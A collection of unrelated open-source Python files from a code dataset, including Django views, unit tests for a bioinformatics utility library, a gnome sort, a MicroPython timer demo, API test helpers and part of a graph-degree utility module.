else: # pragma: no cover
if not isinstance(obj, TMVA.Factory):
raise TypeError(
"obj must be a TMVA.Factory instance")
events = np.ascontiguousarray(events, dtype=np.float64)
if events.ndim == 1:
# convert to 2D
events = events[:, np.newaxis]
elif events.ndim != 2:
raise ValueError(
"events must be a two-dimensional array "
"with one event per row")
targets = np.asarray(targets, dtype=np.float64)
if targets.shape[0] != events.shape[0]:
raise ValueError("the lengths of events and targets do not match")
if targets.ndim == 1:
# convert to 2D
targets = targets[:, np.newaxis]
elif targets.ndim > 2:
raise ValueError("targets can not have more than two dimensions")
if weights is not None:
weights = np.asarray(weights, dtype=np.float64)
if weights.shape[0] != events.shape[0]:
raise ValueError("numbers of events and weights do not match")
if weights.ndim != 1:
raise ValueError("weights must be one-dimensional")
_libtmvanumpy.add_events_regression(
ROOT.AsCObject(obj), events, targets, weights, test)
| StarcoderdataPython |
327840 | import gzip
import os
import subprocess as sp
import tempfile
import uuid
from unittest import mock, TestCase
from unittest.mock import call
import anndata
import kb_python.utils as utils
from kb_python.config import CHUNK_SIZE, UnsupportedOSException
from tests.mixins import TestMixin
def dry_dummy_function(i):
return i + 1
@utils.dryable(dry_dummy_function)
def dummy_function(i):
return i
class TestUtils(TestMixin, TestCase):
def test_dryable_not_dry(self):
with mock.patch('kb_python.utils.is_dry') as is_dry:
is_dry.return_value = False
self.assertEqual(1, dummy_function(1))
def test_dryable_dry(self):
with mock.patch('kb_python.utils.is_dry') as is_dry:
is_dry.return_value = True
self.assertEqual(2, dummy_function(1))
def test_open_as_text_textfile(self):
path = os.path.join(
tempfile.gettempdir(), '{}.txt'.format(uuid.uuid4())
)
with utils.open_as_text(path, 'w') as f:
f.write('TESTING')
self.assertTrue(os.path.exists(path))
with utils.open_as_text(path, 'r') as f:
self.assertEqual(f.read(), 'TESTING')
def test_open_as_text_gzip(self):
path = os.path.join(tempfile.gettempdir(), '{}.gz'.format(uuid.uuid4()))
with utils.open_as_text(path, 'w') as f:
f.write('TESTING')
self.assertTrue(os.path.exists(path))
with utils.open_as_text(path, 'r') as f:
self.assertEqual(f.read(), 'TESTING')
def test_decompress_gzip(self):
filename = str(uuid.uuid4())
gzip_path = os.path.join(
tempfile.gettempdir(), '{}.gz'.format(filename)
)
out_path = os.path.join(tempfile.gettempdir(), filename)
with gzip.open(gzip_path, 'wt') as f:
f.write('TESTING\nTEST')
self.assertEqual(out_path, utils.decompress_gzip(gzip_path, out_path))
self.assertTrue(os.path.exists(out_path))
with open(out_path, 'r') as f:
self.assertEqual('TESTING\nTEST', f.read())
def test_compress_gzip(self):
filename = str(uuid.uuid4())
file_path = os.path.join(tempfile.gettempdir(), filename)
out_path = os.path.join(tempfile.gettempdir(), '{}.gz'.format(filename))
with open(file_path, 'w') as f:
f.write('TESTING\nTEST')
self.assertEqual(out_path, utils.compress_gzip(file_path, out_path))
self.assertTrue(os.path.exists(out_path))
with gzip.open(out_path, 'rt') as f:
self.assertEqual('TESTING\nTEST', f.read())
def test_make_directory(self):
with mock.patch('kb_python.utils.os.makedirs') as makedirs:
utils.make_directory('path')
makedirs.assert_called_once_with('path', exist_ok=True)
def test_remove_directory(self):
with mock.patch('kb_python.utils.shutil.rmtree') as rmtree:
utils.remove_directory('path')
rmtree.assert_called_once_with('path', ignore_errors=True)
def test_run_executable(self):
p = utils.run_executable(['echo', 'TEST'], stream=False)
self.assertEqual(p.stdout.read(), 'TEST\n')
def test_run_exectuable_raises_exception(self):
with self.assertRaises(sp.SubprocessError):
utils.run_executable(['bash', 'nonexistent option'])
def test_run_exectuable_with_returncode(self):
utils.run_executable(['bash', 'nonexistent option'], returncode=127)
def test_run_executable_no_wait(self):
with mock.patch('kb_python.utils.sp') as sp_mock:
sp_mock.Popen().returncode = 0
utils.run_executable(['echo', 'TEST'], wait=False)
sp_mock.Popen().poll.assert_not_called()
def test_run_executable_with_stream(self):
with mock.patch('kb_python.utils.logger.debug') as debug_mock:
utils.run_executable(['echo', 'TEST'], stream=True)
debug_mock.assert_has_calls([call('TEST')])
def test_run_chain(self):
ps = utils.run_chain(['echo', 'TEST'], ['grep', 'T'])
self.assertEqual(ps[1].stdout.read(), 'TEST\n')
def test_run_chain_fails_single_command(self):
with self.assertRaises(AssertionError):
utils.run_chain(['echo', 'TEST'])
def test_run_chain_raises_exception_when_dead(self):
with self.assertRaises(sp.SubprocessError):
utils.run_chain(['sleep', '5'], ['grep', 'TEST'], ['ls'])
def test_get_kallisto_version(self):
with mock.patch('kb_python.utils.run_executable') as run_executable:
run_executable().stdout.read.return_value = 'kallisto 1.2.3'
self.assertEqual((1, 2, 3), utils.get_kallisto_version())
def test_get_bustools_version(self):
with mock.patch('kb_python.utils.run_executable') as run_executable:
run_executable().stdout.read.return_value = 'bustools 1.2.3'
self.assertEqual((1, 2, 3), utils.get_bustools_version())
def test_parse_technologies(self):
lines = [
'short name description',
'---------- -----------',
'10xv1 10x version 1 chemistry',
'10xv2 10x version 2 chemistry',
]
self.assertEqual(utils.parse_technologies(lines), {'10xv1', '10xv2'})
def test_get_supported_technologies(self):
with mock.patch('kb_python.utils.run_executable') as run_executable,\
mock.patch('kb_python.utils.parse_technologies') as parse_technologies:
run_executable().stdout = 'TEST'
utils.get_supported_technologies()
parse_technologies.assert_called_once_with('TEST')
def test_whitelist_provided(self):
self.assertTrue(utils.whitelist_provided('10xv2'))
self.assertFalse(utils.whitelist_provided('UNSUPPORTED'))
def test_download_file(self):
with mock.patch('kb_python.utils.requests.get') as get,\
mock.patch('kb_python.utils.tqdm') as tqdm:
path = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
get.return_value.headers = {'Content-Length': str(1024 * 2)}
get.return_value.iter_content.return_value = [
b'1' * 1024, b'2' * 1024
]
self.assertEqual(path, utils.download_file('remote/path', path))
get.assert_called_once_with('remote/path', stream=True)
tqdm.assert_called_once_with(
unit='B',
total=1024 * 2,
unit_divisor=1024,
unit_scale=True,
ascii=True
)
get.return_value.iter_content.assert_called_once_with(
chunk_size=CHUNK_SIZE
)
self.assertEqual(2, tqdm.return_value.update.call_count)
tqdm.return_value.update.assert_has_calls([call(1024), call(1024)])
tqdm.return_value.close.assert_called_once_with()
with open(path, 'r') as f:
self.assertEqual(('1' * 1024) + ('2' * 1024), f.read())
def test_stream_file(self):
with mock.patch('kb_python.utils.PLATFORM', 'linux'),\
mock.patch('kb_python.utils.os') as os,\
mock.patch('kb_python.utils.threading') as threading,\
mock.patch('kb_python.utils.urlretrieve') as urlretrieve:
url = mock.MagicMock()
path = mock.MagicMock()
utils.stream_file(url, path)
os.mkfifo.assert_called_once_with(path)
threading.Thread.assert_called_once_with(
target=urlretrieve, args=(url, path), daemon=True
)
threading.Thread().start.assert_called_once_with()
def test_stream_file_windows(self):
with mock.patch('kb_python.utils.PLATFORM', 'windows'),\
mock.patch('kb_python.utils.os') as os,\
mock.patch('kb_python.utils.threading') as threading,\
mock.patch('kb_python.utils.urlretrieve') as urlretrieve:
url = mock.MagicMock()
path = mock.MagicMock()
with self.assertRaises(UnsupportedOSException):
utils.stream_file(url, path)
os.mkfifo.assert_not_called()
threading.thread.assert_not_called()
urlretrieve.assert_not_called()
def test_import_tcc_matrix_as_anndata(self):
adata = utils.import_tcc_matrix_as_anndata(
self.tcc_matrix_path, self.tcc_barcodes_path, self.tcc_ec_path,
self.tcc_txnames_path
)
self.assertIsInstance(adata, anndata.AnnData)
self.assertEqual({'transcript_ids'}, set(adata.var))
self.assertEqual(set(), set(adata.obs))
self.assertEqual('ec', adata.var.index.name)
self.assertEqual('barcode', adata.obs.index.name)
def test_import_matrix_as_anndata(self):
adata = utils.import_matrix_as_anndata(
self.matrix_path, self.barcodes_path, self.genes_path
)
self.assertIsInstance(adata, anndata.AnnData)
self.assertEqual(set(), set(adata.var))
self.assertEqual(set(), set(adata.obs))
self.assertEqual('gene_id', adata.var.index.name)
self.assertEqual('barcode', adata.obs.index.name)
def test_overlay_anndatas(self):
adata_spliced = utils.import_matrix_as_anndata(
self.spliced_matrix_path, self.spliced_barcodes_path,
self.spliced_genes_path
)
adata_unspliced = utils.import_matrix_as_anndata(
self.unspliced_matrix_path, self.unspliced_barcodes_path,
self.unspliced_genes_path
)
adata = utils.overlay_anndatas(adata_spliced, adata_unspliced)
self.assertEqual({'spliced', 'unspliced'}, set(adata.layers.keys()))
def test_sum_anndatas(self):
adata_spliced = utils.import_matrix_as_anndata(
self.spliced_matrix_path, self.spliced_barcodes_path,
self.spliced_genes_path
)
adata_unspliced = utils.import_matrix_as_anndata(
self.unspliced_matrix_path, self.unspliced_barcodes_path,
self.unspliced_genes_path
)
adata = utils.sum_anndatas(adata_spliced, adata_unspliced)
self.assertEqual(2.0, adata.X[5, 15])
def test_copy_whitelist(self):
whitelist_path = utils.copy_whitelist('10xv1', tempfile.mkdtemp())
self.assertTrue(os.path.exists(whitelist_path))
def test_concatenate_files(self):
temp_dir = tempfile.mkdtemp()
file1_path = os.path.join(temp_dir, str(uuid.uuid4()))
file2_path = os.path.join(temp_dir, '{}.gz'.format(uuid.uuid4()))
with open(file1_path, 'w') as f:
f.write('TEST1')
with gzip.open(file2_path, 'wt') as f:
f.write('TEST2')
out_path = utils.concatenate_files(
file1_path,
file2_path,
out_path=os.path.join(temp_dir, str(uuid.uuid4())),
temp_dir=tempfile.mkdtemp()
)
with open(out_path, 'r') as f:
self.assertEqual(f.read(), 'TEST1\nTEST2\n')
| StarcoderdataPython |
4980415 | <gh_stars>0
# Importing native django packages:
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import user_passes_test
from django.contrib.staticfiles.storage import staticfiles_storage
from django.templatetags.static import static
from django.conf import settings
from django.db.models.functions import TruncDay, TruncWeek, ExtractWeek, ExtractDay
from django.db.models import Count, Sum
# Importing view logic:
from .article_logic import get_article_categories, get_article_summary, get_full_article
# Importing Article forms & models:
from data_APIs.articles_api.forms import ArticleForm
from data_APIs.articles_api.models import Article
from data_APIs.reddit_api.models import RedditPosts
# Importing Frontend asset models:
from application_frontend.models import SIPRIData
# Importing data manipulation packages:
from openpyxl import load_workbook
from datetime import date, timedelta
import time
import pandas as pd
import os
# Importing visualization packages:
import plotly.graph_objects as go
import plotly.express as px
# Method that checks if user is a staff member:
def is_not_staff(user):
"Checks if the user is a staff member. This method is used in permission decorators."
return user.is_staff
# Homepage Views:
def render_homepage(request):
"""Function that renders the main homepage for the frontend.
In order to populate the homepage it requires article data queried from
the backend.
"""
context = {}
# Querying articles from backend:
articles = get_article_summary(page_size=5)
context["articles"] = articles
return render(request, "application_frontend/homepage/homepage.html", context=context)
# Article Views:
def render_article_homepage(request):
"""View that renders the homepage for articles
- Query Categories.
- Extract top 6 articles for each category
"""
# Creating context to populate:
context = {}
# Extracting all Article Categories:
categories = get_article_categories()
context["categories"] = {}
# Extrating the 6 most recent articles for each cateogry and adding them to an iterable array in context:
for category in categories:
article_summary = get_article_summary(category=category)
context["categories"][category] = article_summary
return render(request, "application_frontend/articles/articles_homepage_layout.html", context=context)
def render_article_full(request, slug:str):
"""The view that renders a full article based on a slug field provided.
"""
context = {}
# Querying article based on slug and adding article to context:
article = get_full_article(slug)
context["article"] = article
return render(request, "application_frontend/articles/full_article.html", context=context)
def render_article_category(request, category:str):
"""The view that renders the front-end template for dispalying all articles within a specific category.
Args:
category (str): The category that will be used to filter all articles.
"""
context = {}
# Making request for article summaries based on the category provided:
articles = get_article_summary(category=category, page_size=50)
context["articles"] = articles
return render(request, "application_frontend/articles/article_category_page.html", context=context)
@user_passes_test(is_not_staff)
def create_article(request, id=None):
"""The view that contains the logic for creating a new article or for editing one if it already exists.
The view uses the traditional logic from django model forms for editing existing articles and creating new
ones. The core logic centers around the form.save() function. There are two main url paths that use this view.
If an 'id' url param is provided (the primary key for articles in the database) then an existing article is being
edited. If no id param is provided then a new article instance is being created.
As it has not been decided if this front-end application will be seperated from the main back-end data ingestion
application these views have been written in a manner where they can easily be converted to a stand-alone project.
This is why most of the article based views rely on external 'article logic' methods as these an be swapped from
using back-end querying through the native django ORM to performing REST API calls. If this move is done there are
some ORM calls and logic in this method that only work because it is part of the same project. If the frontend is
migrated this will have to change.
"""
context = {}
# Logic for initial request - creting the form object:
if request.method == "GET":
# If no id value is provided, render the template with an unpopulated form:
if id == None:
form = ArticleForm(user=request.user)
context["form"] = form
return render(request, "application_frontend/articles/create_articles.html", context=context)
# Pre-populating the form fields with article indicated by the id:
else:
# Querying article:
article = Article.objects.get(id=id)
# Creating the article form pre-poluated with existing fields:
initial = {
"title": article.title,
"author": article.author,
"category": article.category,
"body": article.body
}
form = ArticleForm(initial=initial)
context["form"] = form
return render(request, "application_frontend/articles/create_articles.html", context=context)
# Processing form inputs. An id fields indicates if an Article object is created or updated:
#TODO: If this application is mirgated to another project - change this to a REST based ingestion:
elif request.method == "POST":
# If a form is to be created:
if id == None:
form = ArticleForm(request.POST)
# Validating and saving the article:
if form.is_valid():
article = form.save()
# Redirecting to the newly created article:
return redirect("full_article", slug=article.slug)
# If a form is used to edit an existing article:
else:
# Querying the article to use as an instance in the model form:
existing_article = Article.objects.get(id=id)
form = ArticleForm(request.POST, instance=existing_article)
if form.is_valid():
article = form.save()
# Redirecting to the newly created article:
return redirect("full_article", slug=article.slug)
# Dashboard Views:
def render_dashboard_homepage(request):
"""View that renders the homepage for data dashboards"""
return render(request, "application_frontend/data_dashboards/data_dashboard_layout.html", context={})
def render_sipri_dashboard(request):
"""View that renders the homepage for the SIPRI Data Dashboards"""
# Context to be created:
context={}
# Querying the model object that contains urls to datasets:
datasets = SIPRIData.objects.first()
# Loading the workbook data:
total_arms_sale_sheet = load_workbook("application_frontend/static/application_frontend/data/Total-arms-sales-SIPRI-Top-100-2002-2020.xlsx")["Sheet1"]
# Converting worksheet to pandas dataframe:
data_obj = total_arms_sale_sheet["A4:T4"][0]
date_index = [data.value for data in data_obj][1:]
# Extracting relevant sales data as a dict:
total_sales_dict = {
"Spending Non-Adjusted": [data.value for data in total_arms_sale_sheet["B5:T5"][0]],
"Spending Adjusted": [data.value for data in total_arms_sale_sheet["B8:T8"][0]]
}
total_sales_df = pd.DataFrame(total_sales_dict, index=date_index)
pd.to_datetime(total_sales_df.index)
# Creating plotly graph object out of the dataframe:
total_sales_fig = px.line(
total_sales_df,
x=total_sales_df.index,
y=total_sales_df.columns
)
# Styling the figure and adding it to the context:
total_sales_fig.update_traces(mode="markers+lines", hovertemplate="$%{y} Billion")
total_sales_fig.update_layout(
title="Total Arms Sales from 2002-2020",
xaxis_title="Year",
yaxis_title="Billion ($USD)",
legend_title="Type of Spending",
hovermode="x unified"
)
context["total_arms_sales_fig"] = total_sales_fig.to_html()
# TODO: Add Dash application functionality for the Top 100 Arms Producing Company Data from 2002-2020 Dashboard.
return render(request, "application_frontend/data_dashboards/sipri_dashboard.html", context=context)
# Korea Views:
def render_north_korea_homepage(request):
"""View that renders the homepage for the North Korea homepage"""
return render(request, "application_frontend/north_korea/north_korea_homepage_layout.html", context={})
# Documentation Views:
def render_documentation_homepage(request):
"""View that renders the homepage for the API Documentation"""
return render(request, "application_frontend/documentation/api_documentation_homepage.html", context={})
def render_developer_documentation(request):
return render(request, "application_frontend/documentation/developer_documentation.html", context={})
def render_about_page(request):
"""View that renders the about page"""
return render(request, "application_frontend/documentation/about_page.html", context={})
def render_api_dashboard(request):
""""""
context = {}
# Querying all reddit posts created in the last month:
prev_month = date.today() - timedelta(days=30)
reddit_posts = RedditPosts.objects.filter(created_on__gt=prev_month)
reddit_posts = reddit_posts.values_list("created_on")
# Converting list of records to a dataframe to resample and create plotly graph:
reddit_dataframe = pd.DataFrame.from_records(reddit_posts, columns=["created_on"])
reddit_dataframe["_count"] = 1
reddit_dataframe.set_index(["created_on"], inplace=True)
reddit_posts_resample = reddit_dataframe["_count"].squeeze().resample("D").sum()
# Creating the plotly Timeseries graph for subreddit posts extracted per day:
reddit_timeseries_fig = px.area(
reddit_posts_resample,
x=reddit_posts_resample.index,
y=reddit_posts_resample
)
reddit_timeseries_fig.update_traces(mode="lines", hovertemplate="%{y} Posts on %{x}")
reddit_timeseries_fig.update_layout(
title="Reddit Posts Saved to the Database in the last Month",
xaxis_title="Days",
yaxis_title="Reddit Posts",
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False),
plot_bgcolor="#0d1117"
)
context["reddit_posts_timeseries"] = reddit_timeseries_fig.to_html()
return render(request, "application_frontend/documentation/api_dashboard.html", context=context) | StarcoderdataPython |
1702848 | <reponame>m-payal/AlgorithmsAndDataStructure
"""
Title - Gnome Sort Algorithm
Pupose - Sorts a given array in ascending order.
Time Complexity - O(n^2)
"""
import random
class GnomeSort:
""" GnomeSort Algorithm Implementation
arr: an unordered list
output: return list in ascending order
Example:
>>> sort = GnomeSort()
Gnome Sort Algorithm is Initialized.
>>> sort([2, 6, 3, 1, 9, 4])
[1, 2, 3, 4, 6, 9]
"""
def __init__(self):
print("Gnome Sort Algorithm is Initialized.")
def __call__(self, arr):
i = 0
while i < len(arr):
if i == 0:
i += 1
if arr[i - 1] <= arr[i]:
i += 1
else:
arr[i - 1], arr[i] = arr[i], arr[i - 1]
i -= 1
return arr
sort = GnomeSort()
print(sort([5, 2, 1, 6, 10])) # beginning example
# more populated examples
print(sort(random.sample(range(1, 101), 50)))
print(sort(random.sample(range(1, 201), 100)))
| StarcoderdataPython |
9779349 | #!/usr/bin/env python
import json
import os
from aws_cdk import core
from deploy.deploy_stack import DeployStack
# generated from local-deploy.sh
cfg = "deploy.json"
stackname = None
if os.path.exists(cfg):
with open(cfg) as deploy_cfg:
stackname = json.load(deploy_cfg)["stackname"]
# use user generated stackname or create one
if stackname is None:
homedir = os.path.expanduser("~") # /home/<username>
cwd = os.getcwd() # /my/path/to/projects
owner = os.path.basename(os.path.normpath(homedir))
project = os.path.basename(os.path.normpath(cwd))
stackname = owner + "_" + project # username_project
# run it!
app = core.App()
DeployStack(app, stackname)
app.synth()
| StarcoderdataPython |
1788884 | <reponame>CarterWS/Summer2020<gh_stars>0
# https://github.com/micropython/micropython/blob/master/docs/pyboard/tutorial/timer.rst
import pyb
tim = pyb.Timer(4)
tim.init(freq=10)
tim.callback(lambda t:pyb.LED(1).toggle())
pyb.delay(2000)
tim.callback(None)
tim4 = pyb.Timer(4, freq=10)
tim7 = pyb.Timer(7, freq=20)
tim4.callback(lambda t: pyb.LED(1).toggle())
tim7.callback(lambda t: pyb.LED(2).toggle())
pyb.delay(1000)
tim4.callback(None)
tim7.callback(None)
pyb.LED(1).off()
pyb.LED(2).off() | StarcoderdataPython |
255291 | <reponame>ungood/graupel-1<filename>processing/overlays.py
import cv2
import numpy as np
from collections import namedtuple
from matplotlib import pyplot as plt
from typing import Callable
Layout = namedtuple('Layout', ['x', 'y', 'width', 'height'])
class Overlay:
def __new__(cls, layout: Layout):
new = object.__new__(cls)
new.layout = layout
new.upper_left = (layout.x, layout.y)
new.lower_right = (layout.x + layout.width, layout.y + layout.height)
# Creates a blank canvas
new.canvas = np.zeros((layout.height, layout.width, 1), dtype = "uint8")
return new
def draw(self, image):
image[self.upper_left[1]:self.lower_right[1],self.upper_left[0]:self.lower_right[0]] = self.canvas
class TextOverlay:
pass
class PlotOverlay(Overlay):
def __init__(self, layout: Layout):
# Setup a figure with the right size.
in_per_pix = 1/plt.rcParams['figure.dpi']
self.fig, self.ax = plt.subplots(tight_layout=True)
#self.fig.set_size_inches(layout.width*in_per_pix, layout.height*in_per_pix)
def update(self):
# redraw the canvas
self.fig.canvas.draw()
# convert canvas to image
bytes = np.frombuffer(self.fig.canvas.tostring_rgb(), dtype=np.uint8)
bytes = bytes.reshape(self.fig.canvas.get_width_height()[::-1] + (3,))
bytes = cv2.resize(bytes, (self.layout.width, self.layout.height))
# img is rgb, convert to opencv's default bgr
self.canvas = cv2.cvtColor(bytes, cv2.COLOR_RGB2BGR) | StarcoderdataPython |
5070868 | <filename>preprocessing/image_preprocessing/generate_img_lists.py<gh_stars>10-100
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import print_function
import argparse
import os
import pandas as pd
from sklearn.model_selection import train_test_split
import logging
logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] %(message)s', datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
def file_exists(file):
return os.path.isfile(file)
def parse_args():
parser = argparse.ArgumentParser("Generate lists indexing the Padchest dataset.")
parser.add_argument("-r", "--root-dir", required=False, default="./", help="Root directory of the dataset.")
parser.add_argument("-i", "--image-dir", required=False, default="Images", help="Directory (under --root-dir) containing the dataset images.")
parser.add_argument("-s", "--splits", nargs='+', required=False, default=['train', 'val', 'test'], help="Splits to create.")
parser.add_argument("-is", "--input-suffix", required=False, default="_list.txt", help="Suffix of the lists.")
parser.add_argument("-od", "--output-dir", required=False, default='Annotations', help="Output directory.")
parser.add_argument("-os", "--output-suffix", required=False, default='_list_images.txt', help="Output suffix for all splits.")
parser.add_argument("-v", "--verbose", required=False, action='store_true', default=False, help="Be verbose")
return parser.parse_args()
def generate_lists(root_dir, image_dir, input_suffix, output_dir, output_suffix, splits, verbose):
"""
Generate the list files required for working with an image dataset.
:param root_dir: Root directory of the dataset.
:param image_dir: Directory where the image files are stored (under root_dir).
:param image_id: Name of the field in the csv containing the samples ids.
:param labels: CSV with the dataset labels.
:param separator: Field separator fields of output files.
:param fields: Fields to store in the output files.
:param splits: Splits to create. Typically, ['train', 'val', 'test'].
:param fraction: Fractions of data to (randomly) assign to a split.
:param output_dir: Output directory.
:param output_suffix: Output suffix for all splits.
:param verbose: Be verbose
:return:
"""
if args.verbose:
print('Listing all images from all data splits...')
for split in splits:
s = split + input_suffix
o = split + output_suffix
if verbose:
print('Writing on file', str(root_dir + '/' + output_dir + '/' + o))
s = open(root_dir + '/' + output_dir + '/' + s, 'r')
o = open(root_dir + '/' + output_dir + '/' + o, 'w')
for line in s:
line = line.strip('\n')
this_path = image_dir + "/" + line
o.write(this_path + '\n')
s.close()
o.close()
print('Done!')
if __name__ == "__main__":
args = parse_args()
generate_lists(args.root_dir, args.image_dir, args.input_suffix, args.output_dir, args.output_suffix, args.splits, args.verbose)
| StarcoderdataPython |
1879140 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from collections import OrderedDict
import re
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
f = open("preprocess/iso9", 'rb')
lines = [line for line in f]
bigru = lines[::4]
smallru = lines[1::4]
bigen = lines[2::4]
smallen = lines[3::4]
iso = OrderedDict()
for br, sr, be, se in zip(bigru, smallru, bigen, smallen):
iso[br.replace("\n", "")] = be.replace("\n", "")
iso[sr.replace("\n", "")] = se.replace("\n", "")
def rep(a):
#aa = a.decode('utf-8')
aa = a
for k,v in iso.iteritems():
aa = aa.replace(k,v)
#aa = aa.replace(k.decode('utf-8'),v.decode('utf-8'))
#return aa.encode('utf-8')
return aa
if __name__ == '__main__':
filename = sys.argv[1]
rr = open(filename, 'rb')
txt = rr.read()
txt = rep(txt)
ww = open(filename+".iso9", "w")
ww.write(txt)
rr.close()
ww.close()
| StarcoderdataPython |
1752019 | <reponame>Toskgreg/GoldenLions<filename>tests/test_base.py
import json
from api import app, test_client
class TestBase():
"""
Class containing common test procedures
"""
def create_user_data(self, **kwags):
return {
'user_name': kwags.get('user_name', 'bison'),
'email': kwags.get('email', '<EMAIL>'),
'first_name': kwags.get('first_name', 'bison'),
'last_name': kwags.get('last_name', 'lou'),
'phone_number': kwags.get('phone_number', '0753669897'),
'password': kwags.get('password', '<PASSWORD>'),
'other_names': kwags.get('other_names',''),
'is_admin': kwags.get('is_admin', False)
}
def create_incident_data(self, **kwags):
return {
'title': kwags.get('title', 'title'),
'comment': kwags.get('comment', 'title'),
'latitude': kwags.get('latitude', 0.0001),
'longitude': kwags.get('longitude', 0.0001),
'type': kwags.get('type', 'red-flag'),
'status': kwags.get('status', 'pending'),
'images': kwags.get('images', ['photo_0.jpg']),
'videos': kwags.get('videos', ['video_0002.mov'])
}
def register_user(self, data = dict()):
user = self.create_user_data(**data)
return test_client.post(
'/api/v1/auth/signup',
content_type='application/json',
data=json.dumps(user))
def login_user(self, credentials):
self.register_user()
return test_client.post(
'/api/v1/auth/login',
content_type='application/json',
data=json.dumps(credentials))
def get_token(self, credentials):
response = self.login_user(credentials)
message = json.loads(response.data)
return message['data'][0]['access_token']
def get_users(self, token):
return test_client.get(
'/api/v1/auth/users',
headers={'Authorization': 'Bearer ' + token})
def get_user(self, token):
return test_client.get(
'/api/v1/auth/user',
headers={'Authorization': 'Bearer ' + token})
def post_n_get_token(self, credentials):
token = self.get_token(credentials)
self.post_incident(credentials)
return token
def post_incident(self, credentials, data = dict()):
incident = self.create_incident_data(**data)
token = self.get_token(credentials)
return test_client.post(
'/api/v1/incidents',
content_type='application/json',
headers={'Authorization': 'Bearer ' + token},
data=json.dumps(incident))
def get_incidents(self, credentials, types):
token = self.post_n_get_token(credentials)
return test_client.get(
'/api/v1/'+ types,
headers={'Authorization': 'Bearer ' + token})
def get_totals(self, credentials):
token = self.post_n_get_token(credentials)
return test_client.get(
'/api/v1/incidents/totals',
headers={'Authorization': 'Bearer ' + token})
def get_incident(self, credentials, incident_id):
token = self.post_n_get_token(credentials)
return test_client.get(
'/api/v1/incidents/'+ incident_id,
headers={'Authorization': 'Bearer ' + token})
def patch_incident(self, credentials, incident_id, key):
token = self.post_n_get_token(credentials)
data = self.create_incident_data()
return test_client.patch(
'/api/v1/incidents/'+ incident_id + '/' + key,
content_type='application/json',
headers={'Authorization': 'Bearer ' + token},
data=json.dumps(data))
def put_incident(self, credentials, incident_id):
token = self.post_n_get_token(credentials)
data = self.create_incident_data()
return test_client.put(
'/api/v1/incidents/'+ incident_id,
content_type='application/json',
headers={'Authorization': 'Bearer ' + token},
data=json.dumps(data))
def delete_incident(self, credentials, incident_id):
token = self.post_n_get_token(credentials)
return test_client.delete(
'/api/v1/incidents/'+ incident_id,
headers={'Authorization': 'Bearer ' + token})
def get_welcome(self):
return test_client.get(
'/')
| StarcoderdataPython |
12851781 | # -*- coding: utf-8 -*-
# Copyright (C) 2017-2019 by
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# BSD license.
#
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""Assorted degree related graph utilities.
"""
import collections
from grinpy import degree, nodes, number_of_nodes
from grinpy.functions.neighborhoods import closed_neighborhood, neighborhood, set_neighborhood, set_closed_neighborhood
__all__ = [
"degree_sequence",
"min_degree",
"max_degree",
"average_degree",
"number_of_nodes_of_degree_k",
"number_of_degree_one_nodes",
"number_of_min_degree_nodes",
"number_of_max_degree_nodes",
"neighborhood_degree_list",
"closed_neighborhood_degree_list",
"is_regular",
"is_k_regular",
"is_sub_cubic",
"is_cubic",
]
def degree_sequence(G):
"""Return the degree sequence of G.
The degree sequence of a graph is the sequence of degrees of the nodes
in the graph.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
list
The degree sequence of the graph.
Examples
--------
>>> G = nx.path_graph(3) # Path on 3 nodes
>>> nx.degree_sequence(G)
[1, 2, 1]
"""
return [degree(G, v) for v in nodes(G)]
def min_degree(G):
"""Return the minimum degree of G.
The minimum degree of a graph is the smallest degree of any node in the
graph.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
int
The minimum degree of the graph.
Examples
--------
>>> G = nx.path_graph(3) # Path on 3 nodes
>>> nx.min_degree(G)
1
"""
D = degree_sequence(G)
D.sort()
return D[0]
def max_degree(G):
"""Return the maximum degree of G.
The maximum degree of a graph is the largest degree of any node in the
graph.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
int
The maximum degree of the graph.
Examples
--------
>>> G = nx.path_graph(3) # Path on 3 nodes
>>> nx.min_degree(G)
2
"""
D = degree_sequence(G)
D.sort(reverse=True)
return D[0]
def average_degree(G):
"""Return the average degree of G.
The average degree of a graph is the average of the degrees of all nodes
in the graph.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
float
The average degree of the graph.
Examples
--------
>>> G = nx.star_graph(3) # Star on 4 nodes
>>> nx.average_degree(G)
1.5
"""
return sum(degree_sequence(G)) / number_of_nodes(G)
def number_of_nodes_of_degree_k(G, k):
"""Return the number of nodes of the graph with degree equal to k.
Parameters
----------
G : NetworkX graph
An undirected graph.
k : int
A positive integer.
Returns
-------
int
The number of nodes in the graph with degree equal to k.
See Also
--------
number_of_leaves, number_of_min_degree_nodes, number_of_max_degree_nodes
Examples
--------
>>> G = nx.path_graph(3) # Path on 3 nodes
>>> nx.number_of_nodes_of_degree_k(G, 1)
2
"""
return sum(1 for v in nodes(G) if degree(G, v) == k)
def number_of_degree_one_nodes(G):
"""Return the number of nodes of the graph with degree equal to 1.
A vertex with degree equal to 1 is also called a *leaf*.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
int
The number of nodes in the graph with degree equal to 1.
See Also
--------
number_of_nodes_of_degree_k, number_of_min_degree_nodes,
number_of_max_degree_nodes
Examples
--------
>>> G = nx.path_graph(3) # Path on 3 nodes
>>> nx.number_of_leaves(G)
2
"""
return number_of_nodes_of_degree_k(G, 1)
def number_of_min_degree_nodes(G):
"""Return the number of nodes of the graph with degree equal to the minimum
degree of the graph.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
int
The number of nodes in the graph with degree equal to the minimum
degree.
See Also
--------
number_of_nodes_of_degree_k, number_of_leaves, number_of_max_degree_nodes,
min_degree
Examples
--------
>>> G = nx.path_graph(3) # Path on 3 nodes
>>> nx.number_of_min_degree_nodes(G)
2
"""
return number_of_nodes_of_degree_k(G, min_degree(G))
def number_of_max_degree_nodes(G):
"""Return the number of nodes of the graph with degree equal to the maximum
degree of the graph.
Parameters
----------
